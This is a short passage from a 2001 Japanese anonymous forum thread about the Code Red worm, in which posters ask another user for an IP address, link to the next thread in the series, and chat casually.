932名無しさん@お腹いっぱい。:2001/08/14(火) 19:19
>>923 IPきぼーん
933え〜ん:2001/08/14(火) 19:39
923さんIP希望

新スレ
コードレッドパート5 日本政府は反省汁
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997783469

みんなまってるYO
934名無しさん@お腹いっぱい。
っつーか、結局Qちゃんはここ見たのだろうか?